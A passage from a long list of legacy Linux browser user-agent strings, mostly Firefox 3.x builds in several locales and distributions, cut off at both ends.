Linux i686; en-US; rv:1.8.0.7) Gecko/20060910 SeaMonkey/1.0.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060928 (Debian-1.8.0.7-1) Epiphany/2.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20061022 Iceweasel/1.5.0.7-g2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20061031 Firefox/1.5.0.7 Flock/0.7.7 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061029 SeaMonkey/1.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 Firefox/3.07 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042513 Linux Mint/5 (Elyssa) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Linux Mint/6 (Felicia) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Linux Mint/7 (Gloria) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042812 Gentoo Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060310 Linux Mint/6 (Felicia) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070610 Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070812 Linux Mint/5 (Elyssa) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070818 Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 FirePHP/0.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090905 Fedora/3.0.14-1.fc10 Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009091010 Firefox/3.0.14 (Debian-3.0.14-1) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/20090916 Ubuntu/9.04 (jaunty) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17 FirePHP/0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.19) Gecko/2010091807 Firefox/3.0.6 (Debian-3.0.6-3) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1pre) Gecko/2008062222 Firefox/3.0.1pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008091816 Red Hat/3.0.2-3.el5 Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092000 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/1.4.0 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092418 CentOS/3.0.2-3.el5.centos Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092809 Gentoo Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008110715 ASPLinux/3.0.2-3.0.120asp Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3pre) Gecko/2008090713 Firefox/3.0.3pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4pre) Gecko/2008101311 Firefox/3.0.4pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121622 Linux Mint/6 (Felicia) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121718 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121914 Ubuntu/8.04 (hardy) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2009011301 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-0.1 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc10 Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc9 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020518 Ubuntu/9.04 (jaunty) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020616 Gentoo Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6 FirePHP/0.2.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009022111 Gentoo Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009022714 Ubuntu/9.04 (jaunty) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko/2009032018 Firefox/3.0.4 (Debian-3.0.6-1) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009040820 Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009041408 Red Hat/3.0.9-1.el5 Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Linux Mint/6 (Felicia) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1) Gecko/20090701 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Slackware/13.0 Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2pre) Gecko/20090729 Ubuntu/9.04 (jaunty) Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090912 Gentoo Firefox/3.5.3 FirePHP/0.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090919 Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.4) Gecko/20091028 Ubuntu/9.10 (karmic) Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6) Gecko/20100118 Gentoo Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100315 Ubuntu/9.10 (karmic) Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9 GTB7.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1b3) Gecko/20090407 Firefox/3.1b3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 FirePHP/0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Ubuntu/10.04 (lucid) Firefox/3.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100128 Gentoo Firefox/3.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.1) Gecko/20100122 firefox/3.6.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.04 (jaunty) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100312 Ubuntu/9.04 (jaunty) Firefox/3.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100404 Ubuntu/10.04 (lucid) Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.4) Gecko/20100625 Gentoo Firefox/3.6.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100727 Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/3.0a1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b2) Gecko/2007121016 Firefox/3.0b2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3) Gecko/2008020513 Firefox/3.0b3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3pre) Gecko/2008010415 Firefox/3.0b -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3pre) Gecko/2008020507 Firefox/3.0b3pre -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4) Gecko/2008031317 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008021712 Firefox/3.0b4pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008021714 Firefox/3.0b4pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9pre) Gecko/2008040318 Firefox/3.0pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-us; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; en; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Linux Mint/5 (Elyssa) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.10) Gecko/2009042513 Linux Mint/5 (Elyssa) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009060309 Linux Mint/5 (Elyssa) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009060310 Ubuntu/8.10 (intrepid) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc9 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.14) Gecko/2009090216 Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6 GTB6 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.7) Gecko/20091222 SUSE/3.5.7-1.1.1 Firefox/3.5.7 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1 Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux i686; eu; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-0.1.2 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.13) Gecko/2009080315 Linux Mint/6 (Felicia) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.0.5) Gecko/2008123017 Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; fr-be; rv:1.9.0.8) Gecko/2009073022 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.03 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.10 (intrepid) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.7) Gecko/2009031218 Gentoo Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.04 (hardy) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 -Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.0.10) Gecko/2009042718 CentOS/3.0.10-1.el5.centos Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.10 (intrepid) Firefox/3.0.7 FirePHP/0.2.4 -Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-1.fc12 Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9) Gecko/2008061015 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc10 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.4) Gecko/2008111217 Red Hat Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.5) Gecko/2008121711 Ubuntu/9.04 (jaunty) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9) Gecko/2008061015 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.11) Gecko/2009060309 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.3) Gecko/2008092700 SUSE/3.0.3-2.2 Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.4) Gecko/20081031100 SUSE/3.0.4-4.6 Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.5) Gecko/2008121300 SUSE/3.0.5-0.1 Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.5) Gecko/2008121622 Slackware/2.6.27-PiP Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.7) Gecko/2009030422 Kubuntu/8.10 (intrepid) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.7) Gecko/2009030503 Fedora/3.0.7-1.fc10 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9b4) Gecko/2008030800 SUSE/2.9.94-4.2 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.1.2) Gecko/20090804 Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.2a1pre) Gecko/20090405 Ubuntu/9.04 (jaunty) Firefox/3.6a1pre -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9) Gecko/2008061812 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.3a5pre) Gecko/20100526 Firefox/3.7a5pre -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9b5) Gecko/2008032600 SUSE/2.9.95-25.1 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; rv:1.9) Gecko/2008080808 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; rv:1.9) Gecko/20080810020329 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9) Gecko/2008061015 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.5) Gecko/2008121621 Ubuntu/8.04 (hardy) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.1) Gecko/20090630 Fedora/3.5-1.fc11 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9b5) Gecko/2008032600 SUSE/2.9.95-25.1 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.6) Gecko/20091216 Fedora/3.5.6-1.fc11 Firefox/3.5.6 GTB6 -Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.2.8) Gecko/20100722 Ubuntu/10.04 (lucid) Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux ia64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux ppc; en-GB; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; 